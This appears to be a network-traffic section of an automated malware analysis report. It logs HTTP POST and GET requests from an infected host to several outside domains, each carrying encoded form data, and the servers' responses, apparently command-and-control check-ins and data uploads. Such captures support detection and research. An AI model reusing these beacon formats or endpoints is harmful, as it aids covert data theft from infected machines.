                                                                                Referer: http://www.vayui.top/4twy/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 6a 73 62 38 64 50 44 6d 30 57 4f 37 2b 63 43 57 4c 76 57 49 78 43 66 49 6e 67 6a 68 68 73 50 48 6b 34 4b 50 6d 6d 77 33 52 34 73 55 4f 43 39 6d 59 69 7a 68 79 72 61 6d 48 36 2f 77 58 41 6f 4c 50 36 47 2f 49 62 37 43 54 64 49 2f 6e 53 79 72 45 79 34 6b 62 34 41 71 31 51 37 44 2f 45 79 53 37 39 57 63 6b 62 54 36 51 32 49 33 75 66 4a 43 4a 43 61 2f 39 59 64 2f 68 75 49 6f 47 62 49 57 35 37 62 6e 6e 34 6b 77 67 74 4f 2f 75 53 63 31 73 31 6f 30 55 48 64 73 6e 77 61 41 55 76 78 32 76 44 6d 35 55 41 46 77 38 6a 4f 63 64 75 61 45 52 49 52 65 6b 7a 4b 30 54 6e 6d 68 57 33 72 68 77 59 59 65 37 72 54 4b 56 33 45 67 5a 55 50 48 51 2b 66 34 4a 45 6a 50 57 56 34 6e 6f 62 69 49 6d 44 53 4a 74 49 58 73 69 31 49 44 33 56 38 72 55 38 61 36 4d 71 67 6a 61 43 45 71 37 73 72 55 67 52 6c 49 6b 72 42 30 53 76 6d 61 6b 32 38 6a 53 71 6c 38 61 68 6b 44 73 45 6f 74 6b 61 56 6e 6d 78 36 4e 71 4d 4d 33 2f 66 2b 33 71 38 62 73 73 6d 33 6f 45 39 75 59 78 56 58 6d 4b 72 4f 4f [TRUNCATED]
                                                                                Data Ascii: 2WLcH=rDqkmhD2LOnTjsb8dPDm0WO7+cCWLvWIxCfIngjhhsPHk4KPmmw3R4sUOC9mYizhyramH6/wXAoLP6G/Ib7CTdI/nSyrEy4kb4Aq1Q7D/EyS79WckbT6Q2I3ufJCJCa/9Yd/huIoGbIW57bnn4kwgtO/uSc1s1o0UHdsnwaAUvx2vDm5UAFw8jOcduaERIRekzK0TnmhW3rhwYYe7rTKV3EgZUPHQ+f4JEjPWV4nobiImDSJtIXsi1ID3V8rU8a6MqgjaCEq7srUgRlIkrB0Svmak28jSql8ahkDsEotkaVnmx6NqMM3/f+3q8bssm3oE9uYxVXmKrOObA5iEGlygopdYA9v1omvejoQCbTulyXECk/gKl26XwR6WjuSqAl8ZlU3Fwc79CvF9D4aNN/3t9gBKlaVuBFTaDDdR9+krZcVrccQa7NRUD53HG/JZR0rGmoLHV59absSBUrUbKonsjRKV0V9yVRWb6cqeiwcJ9Nx5QtJbU65jgOyoVHkYgKyXQg7/S1b+1tI01RyD5zBKHp9GsDrxsh8asfQxB0bhcAaqHIXS1iLwaJvpA+bSW7hKKIu3r5mgtDx5ic41mRbE/fzOkVxBm2Kqe+LaYq4dNOex/o/ViL/k3+SUZmNJyZ1/9O3FEhpE6z50I1IEF7P3V11/1ZfQiWGXZ6vpQWT6jG+SCpu3fz6DlLiZwWUNGrSTbpXAxl7v15bVqnsJ/Be0ETiUAe/w1bOzWa8m0XsT4Uspuql6WWTXCGbYg4J50iLpeS0cCsnvNdfcLpgr+lTWwu1GR3Y0Vcam0lZBjp3BZzJ16ShmDwUtM00LnvrjsPxqlXanSvkBAxMWaq4T9Gsg4g4O9hZZf2sYNVvC9I4nVvQCvYxkklApuNdp0sH1/srYSKyu/2/8Vol/GoCnueK1PorYn+YCce64tAmJAxheiJIiB/pbrGWqRjnwWP66qKpv5Wh6KJB4xB7T417Tu1iQ8jahhjeHGzz1GJuQJWnBoCoIR [TRUNCATED]
                                                                                Nov 25, 2024 12:01:07.899480104 CET3867OUTData Raw: 31 2b 42 38 68 30 62 6a 37 68 4e 45 36 4c 79 79 79 66 41 4f 46 6f 68 53 33 72 64 38 33 6c 54 58 55 46 73 61 58 77 6f 64 47 58 4b 6b 75 46 53 37 6a 57 64 31 36 78 4b 68 37 43 34 45 78 63 63 68 78 7a 77 53 66 6d 76 6e 76 4c 6c 2b 4b 45 47 69 77 64
                                                                                Data Ascii: 1+B8h0bj7hNE6LyyyfAOFohS3rd83lTXUFsaXwodGXKkuFS7jWd16xKh7C4ExcchxzwSfmvnvLl+KEGiwdpGgkISWGsXVBiszjq8a/Ktb8FwdH/vm99iAPS7O8mjsQyVFMXiNBHWOn7fyRrhX0xvuWwTON9x43ibo7Dh5HMclffS1+L86lXdYOXg0lI0z7qR+QajtBSNwAADKAV5ErhWY30CVlSJwPxVtw31vR/OTlC9ZkPLZFv
                                                                                Nov 25, 2024 12:01:07.899549961 CET1289OUTData Raw: 5a 76 35 59 55 30 5a 54 67 5a 65 68 63 4e 52 70 55 4f 6b 63 35 44 64 57 51 32 49 63 32 36 51 34 6f 43 30 76 70 4e 54 53 59 78 74 69 77 34 4b 72 56 73 41 32 78 4d 2f 34 68 72 6e 70 4c 49 45 4a 4d 33 78 4b 6b 61 56 68 77 35 6d 33 62 4e 36 72 4c 44
                                                                                Data Ascii: Zv5YU0ZTgZehcNRpUOkc5DdWQ2Ic26Q4oC0vpNTSYxtiw4KrVsA2xM/4hrnpLIEJM3xKkaVhw5m3bN6rLDt7aLqUMzLQqI2Ql2ddS3kRxG6ULh+4wCGrfMpM7NQa28zTCCV9BF6OysJcGKbWepdYUZY5JY4GsORtBa+PN5mlz72pHZq8iBnBNxbFB4JhgOJSoELQbp0hQbe+PCDVxrHHAGcemRXhlLaaRkDnNeSYE5BGS6kbJIo
                                                                                Nov 25, 2024 12:01:07.899728060 CET144OUTData Raw: 4a 56 5a 47 39 7a 56 34 42 41 72 45 2f 30 6a 38 41 59 65 44 55 74 68 5a 52 56 4f 64 6e 43 48 69 4e 71 5a 78 43 37 76 32 77 76 43 4a 44 32 59 6c 42 31 2f 79 61 50 59 72 38 6c 5a 51 63 6c 34 64 2f 42 6d 6d 45 4c 6d 36 74 38 6a 65 57 63 4b 47 64 48
                                                                                Data Ascii: JVZG9zV4BArE/0j8AYeDUthZRVOdnCHiNqZxC7v2wvCJD2YlB1/yaPYr8lZQcl4d/BmmELm6t8jeWcKGdHTz2FNmjIGhOVbxHam+Fe86iT93FjHudOOjynTkvHXq1/rwpHtXsgzvg+WuMA==
                                                                                Nov 25, 2024 12:01:08.453958035 CET791INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:01:08 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2B6hUJV6d1K21VcZq0%2F%2F%2B3vwjTJkXWpmTCf3SZGwxBepnECy9DVgtCWiRf6zN8AjepP8R21nK6WKz0jQX1lU4xIg0%2F2q5RG2laKaje9lXbSdZFa6DXDTMj%2FVTD89V4o%2F"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e812394a8e443b0-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97738&sent=4&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7878&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                Data Ascii: f
                                                                                Nov 25, 2024 12:01:08.453968048 CET110INData Raw: 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9
                                                                                Data Ascii: 63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                54192.168.11.2049795172.67.145.23480
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:10.522569895 CET451OUTGET /4twy/?2WLcH=mBCElVLkK93E7Nf+Sf/fyHG4g+iIHO2SyRrruRXkg+zqtIWho1c/UJ5ICRtgbVPxo7eZFunASSkRDpjuJtL+E+17mAmUYSpmNLkEhz/yhl+/g4aluoCzA3U=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:01:10.756262064 CET890INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:01:10 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUxpLconqKnckTGgqxyCYbND%2FteMLsBeqyCP7sBG%2BII5T8KHTvQFIe9A2kc2p823eVw7fMGKTiSFEtOrdt4h1KlnoLj7S%2B2dKzywapoH6Uukmsd8XVcOyZkhgCjkq5yY"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8123a51dbc424f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97287&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=451&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                Nov 25, 2024 12:01:10.756303072 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                55192.168.11.204979613.248.169.4880
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:15.874686003 CET706OUTPOST /tj5o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Origin: http://www.tals.xyz
                                                                                Referer: http://www.tals.xyz/tj5o/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 42 6a 75 6a 69 6d 72 4e 4b 69 69 56 62 51 65 54 69 6b 31 38 54 67 49 48 58 79 70 52 6a 58 65 39 42 61 63 38 4b 77 78 38 71 34 54 45 76 78 4a 6d 70 6b 50 75 52 4d 59 71 47 50 6a 42 39 49 44 41 2b 63 6c 41 62 63 32 36 71 54 48 59 49 4c 48 41 64 57 48 33 45 70 4b 77 30 72 78 48 50 61 38 75 78 59 74 64 50 31 54 51 46 61 79 4b 55 33 66 4c 4d 43 67 70 38 37 55 42 64 50 32 47 31 2f 52 62 58 4c 4b 64 43 67 54 74 77 77 4f 75 2b 37 65 47 46 6f 48 35 73 4b 54 46 58 6f 68 6e 6d 45 69 61 63 36 6b 6f 74 73 6f 32 63 69 64 51 72 31 6f 36 38 57 73 61 4e 59 44 4c 64 6c 6c 64 73 57 6a 51 77 67 3d 3d
                                                                                Data Ascii: 2WLcH=BjujimrNKiiVbQeTik18TgIHXypRjXe9Bac8Kwx8q4TEvxJmpkPuRMYqGPjB9IDA+clAbc26qTHYILHAdWH3EpKw0rxHPa8uxYtdP1TQFayKU3fLMCgp87UBdP2G1/RbXLKdCgTtwwOu+7eGFoH5sKTFXohnmEiac6kotso2cidQr1o68WsaNYDLdlldsWjQwg==


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                56192.168.11.204979713.248.169.4880
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:18.514669895 CET726OUTPOST /tj5o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Origin: http://www.tals.xyz
                                                                                Referer: http://www.tals.xyz/tj5o/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 42 6a 75 6a 69 6d 72 4e 4b 69 69 56 4a 42 75 54 67 44 68 38 55 41 49 45 4a 69 70 52 71 33 65 68 42 61 51 38 4b 78 31 73 70 4b 33 45 75 56 4e 6d 6f 67 6a 75 57 4d 59 71 4f 76 6a 45 35 49 44 39 2b 63 6f 39 62 5a 57 36 71 54 54 59 49 50 44 41 64 68 54 32 43 70 4b 79 74 37 78 5a 51 4b 38 75 78 59 74 64 50 31 58 36 46 61 4b 4b 55 45 58 4c 4d 6a 67 71 2f 37 55 41 4d 50 32 47 2f 66 52 48 58 4c 4b 2f 43 6c 75 6c 77 79 47 75 2b 36 75 47 45 38 54 36 31 36 54 44 61 49 67 46 74 56 58 34 53 4f 63 47 38 73 45 51 56 58 52 77 71 6a 6c 67 68 6b 59 2b 4f 4c 66 35 5a 56 63 31 75 55 69 4c 74 72 37 79 33 6b 35 36 6e 2b 56 68 34 4f 6c 42 74 39 6c 4b 4c 42 38 3d
                                                                                Data Ascii: 2WLcH=BjujimrNKiiVJBuTgDh8UAIEJipRq3ehBaQ8Kx1spK3EuVNmogjuWMYqOvjE5ID9+co9bZW6qTTYIPDAdhT2CpKyt7xZQK8uxYtdP1X6FaKKUEXLMjgq/7UAMP2G/fRHXLK/ClulwyGu+6uGE8T616TDaIgFtVX4SOcG8sEQVXRwqjlghkY+OLf5ZVc1uUiLtr7y3k56n+Vh4OlBt9lKLB8=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                57192.168.11.204979813.248.169.4880
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:21.153971910 CET2578OUTPOST /tj5o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Origin: http://www.tals.xyz
                                                                                Referer: http://www.tals.xyz/tj5o/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 42 6a 75 6a 69 6d 72 4e 4b 69 69 56 4a 42 75 54 67 44 68 38 55 41 49 45 4a 69 70 52 71 33 65 68 42 61 51 38 4b 78 31 73 70 4b 2f 45 75 6d 56 6d 6f 42 6a 75 58 4d 59 71 50 76 6a 46 35 49 44 61 2b 63 78 36 62 5a 53 4d 71 56 66 59 49 71 58 41 62 56 2f 32 58 5a 4b 79 77 72 78 59 50 61 38 65 78 62 45 31 50 31 48 36 46 61 4b 4b 55 46 6e 4c 4c 79 67 71 7a 62 55 42 64 50 32 43 31 2f 52 6a 58 4b 6a 49 43 6b 61 31 7a 44 6d 75 2b 61 2b 47 47 4b 76 36 71 4b 54 42 55 6f 67 6a 74 56 4c 4f 53 4f 6f 30 38 73 67 75 56 51 31 77 6f 58 51 57 35 46 59 63 54 59 4c 72 53 6d 45 56 68 55 71 76 6c 38 50 38 39 55 56 39 6b 71 38 31 6b 63 5a 76 30 39 6b 4e 5a 68 46 2f 6b 4f 55 51 41 64 76 48 6b 6a 43 74 49 7a 6b 6e 6a 33 4a 73 33 5a 37 4f 45 4d 71 35 77 66 6b 57 35 2b 51 75 6c 78 51 44 41 57 72 37 47 35 71 68 67 35 6d 32 43 50 55 42 65 56 37 76 65 43 51 35 53 78 42 76 69 63 6e 58 43 2b 72 6c 77 4f 78 61 58 38 69 76 51 33 69 4c 53 46 6d 36 43 6b 65 74 33 49 2f 55 4a 2f 77 76 6f 78 64 32 48 79 57 55 67 67 42 2b [TRUNCATED]
                                                                                Data Ascii: 2WLcH=BjujimrNKiiVJBuTgDh8UAIEJipRq3ehBaQ8Kx1spK/EumVmoBjuXMYqPvjF5IDa+cx6bZSMqVfYIqXAbV/2XZKywrxYPa8exbE1P1H6FaKKUFnLLygqzbUBdP2C1/RjXKjICka1zDmu+a+GGKv6qKTBUogjtVLOSOo08sguVQ1woXQW5FYcTYLrSmEVhUqvl8P89UV9kq81kcZv09kNZhF/kOUQAdvHkjCtIzknj3Js3Z7OEMq5wfkW5+QulxQDAWr7G5qhg5m2CPUBeV7veCQ5SxBvicnXC+rlwOxaX8ivQ3iLSFm6Cket3I/UJ/wvoxd2HyWUggB+wTTR0gWYVpHgj0To4LW2oUVpnHGG9/b63WrOWoM6ygN/BvNB1K+DSSLs2D9+uyimjNdkcpCiFyELVYtGcin8pO0RO7IVouW5IXpV3RzoZ4egYtNoRMQirw4WTor0KOQBghaPCRVhT5HoOij5SgCarYHi1JgjnmsJVB+bShqR++vDl80geymE+iVIVymWnw2vjIjY4c2agFAQO8/QuFDFPxGYPzaffGsCNsjmCVJDGCA2+7w9MnK4Z/0whly6NYoLT6QP+8C6xqVz/KX3wT7CzLDzit9UowPZBfoUJfxVLmOO9Lfw28Kunqvl7NhIneAjbUz0V91jFOeRMEFaHcnRBfwPXncNDPEYk9o1S9xkUhd4kMAiuM2laQZh9/f0GYZKE8U+q5U2CVJNxFyAOqSbNZdc06mNx72uDDKZY28B0GeRuoZr7b0cLli9yhCX8K3LilmyOpwsNAu5Ldo85q/QaL92/8PcLVwHxBEGmCe6PLfOfacQ1VVjRI8Fpt7WR0fLE7foP5WP7J5YzjIz5CUx8I9AUynbPAHnUH2GyUIVv3hY+Ij3GqzleSpxSuM6swmEGnS7F+IaflfNJruyULJ3QvTls80E+iApsQ9zhmU8Dd7ot9DlYirGbjz4MJLvpYWMY9RtI5bdtJzafZJS/yqyPKJDcpcO+icmsz [TRUNCATED]
                                                                                Nov 25, 2024 12:01:21.154037952 CET5297OUTData Raw: 66 64 50 4b 67 5a 51 56 44 61 6d 75 56 65 53 71 71 71 54 37 63 39 59 4b 37 48 5a 7a 4a 5a 31 52 76 6a 4b 54 46 31 7a 77 55 6d 58 4a 4f 33 2b 38 6f 74 36 70 6f 4a 4f 58 35 78 55 33 71 68 4d 45 66 73 4c 34 41 4e 69 75 7a 74 50 35 42 74 6b 54 79 62
                                                                                Data Ascii: fdPKgZQVDamuVeSqqqT7c9YK7HZzJZ1RvjKTF1zwUmXJO3+8ot6poJOX5xU3qhMEfsL4ANiuztP5BtkTybPnYyBUDFLpLKHpMsCD//ByIrjPwz3RlxnIy0cleO6KYhpH9f8mAif2Ccseggub51WSRDtyrZQDqGvlevNCblvzJDo4S+1J/9jbx6aruoTtjtXzxQ3/vLkwvYOZdCBu5nU9NVwPJ4TQYvH82a+KAFV3Xr+VsRV7S9k


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                58192.168.11.204979913.248.169.4880
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:23.792421103 CET450OUTGET /tj5o/?ZQ=9w6eOuayM&2WLcH=MhGDhTK4KRmGDwnOvV5WTz4iIRJmk2m8IatiCmUJgqSFlXJgrRiMUM9JCqLDwZv9mOpEe9GWmALCKqKQahiZVY7y7ZV5P9kCtZ0hNHTZPf+sBxGPFSp4opc= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:01:23.896320105 CET394INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Mon, 25 Nov 2024 11:01:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 254
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 51 3d 39 77 36 65 4f 75 61 79 4d 26 32 57 4c 63 48 3d 4d 68 47 44 68 54 4b 34 4b 52 6d 47 44 77 6e 4f 76 56 35 57 54 7a 34 69 49 52 4a 6d 6b 32 6d 38 49 61 74 69 43 6d 55 4a 67 71 53 46 6c 58 4a 67 72 52 69 4d 55 4d 39 4a 43 71 4c 44 77 5a 76 39 6d 4f 70 45 65 39 47 57 6d 41 4c 43 4b 71 4b 51 61 68 69 5a 56 59 37 79 37 5a 56 35 50 39 6b 43 74 5a 30 68 4e 48 54 5a 50 66 2b 73 42 78 47 50 46 53 70 34 6f 70 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZQ=9w6eOuayM&2WLcH=MhGDhTK4KRmGDwnOvV5WTz4iIRJmk2m8IatiCmUJgqSFlXJgrRiMUM9JCqLDwZv9mOpEe9GWmALCKqKQahiZVY7y7ZV5P9kCtZ0hNHTZPf+sBxGPFSp4opc="}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                59192.168.11.204980231.31.196.17780
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:29.123054981 CET730OUTPOST /sr6d/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Origin: http://www.nartex-uf.online
                                                                                Referer: http://www.nartex-uf.online/sr6d/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 34 51 42 73 48 70 48 77 45 39 4b 4a 69 51 6f 76 67 55 6e 77 61 6a 52 4b 50 6b 48 6c 50 4c 75 4b 73 74 63 64 55 5a 65 77 2b 46 65 4f 50 52 62 4e 36 6b 54 55 32 4a 67 43 6d 70 72 67 4f 70 38 4d 4d 42 46 59 48 36 38 36 65 74 66 32 69 6b 45 34 59 6c 6c 45 54 43 35 5a 32 42 51 4a 67 72 64 56 4d 64 79 48 50 66 32 4b 4a 2f 76 47 69 62 59 2f 73 78 4c 30 50 67 64 30 54 42 64 6f 31 35 6c 52 46 54 5a 42 68 7a 55 66 37 49 71 49 6f 34 4d 51 5a 63 49 58 72 34 67 64 52 4c 4b 52 30 6d 5a 66 50 79 63 73 31 38 47 39 79 53 32 43 72 6a 2b 6f 31 44 42 6b 55 52 38 7a 48 38 68 34 2f 61 70 58 6a 41 3d 3d
                                                                                Data Ascii: 2WLcH=4QBsHpHwE9KJiQovgUnwajRKPkHlPLuKstcdUZew+FeOPRbN6kTU2JgCmprgOp8MMBFYH686etf2ikE4YllETC5Z2BQJgrdVMdyHPf2KJ/vGibY/sxL0Pgd0TBdo15lRFTZBhzUf7IqIo4MQZcIXr4gdRLKR0mZfPycs18G9yS2Crj+o1DBkUR8zH8h4/apXjA==
                                                                                Nov 25, 2024 12:01:29.365194082 CET1289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:01:29 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                                                Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvc_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                                                Nov 25, 2024 12:01:29.365242004 CET1289INData Raw: 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c 86 63 ce 08 4d e0 24 76 61 68 fc fd cb 42 5a 28 8b 31 33 a5 25 38 a8 d8 ed 4b 64 25 c0 12 fa 88 ff 07 0a dc 35 82 09 ca 26 b5 94 87 82 d0 41 32 cf 64 a1 8d c9
                                                                                Data Ascii: |l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9ZuWY$n>Mo5XOJV3Dm<ZPW4C+
